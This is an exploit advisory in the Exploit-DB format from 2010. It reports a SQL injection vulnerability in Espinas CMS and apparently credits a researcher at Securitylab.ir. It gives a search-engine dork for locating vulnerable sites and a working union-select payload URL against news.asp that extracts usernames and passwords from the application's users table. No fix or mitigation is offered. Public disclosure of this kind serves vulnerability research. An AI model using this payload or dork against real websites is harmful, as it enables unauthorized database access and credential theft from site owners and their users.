Espinas CMS - SQL Injection

EDB-ID:

12100

CVE:

N/A




Platform:

ASP

Date:

2010-04-07


#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Espinas CMS
# Vendor: http://espinas.ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: "Powered by Espinas IT"
#################################################################
Vulnerability:
http://site.ir/news.asp?id=-1+union+select+1,concat(username,0x3a,0x3a,password),3,4,5+from+sinabed_users
--------------------------------------------------------------

#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################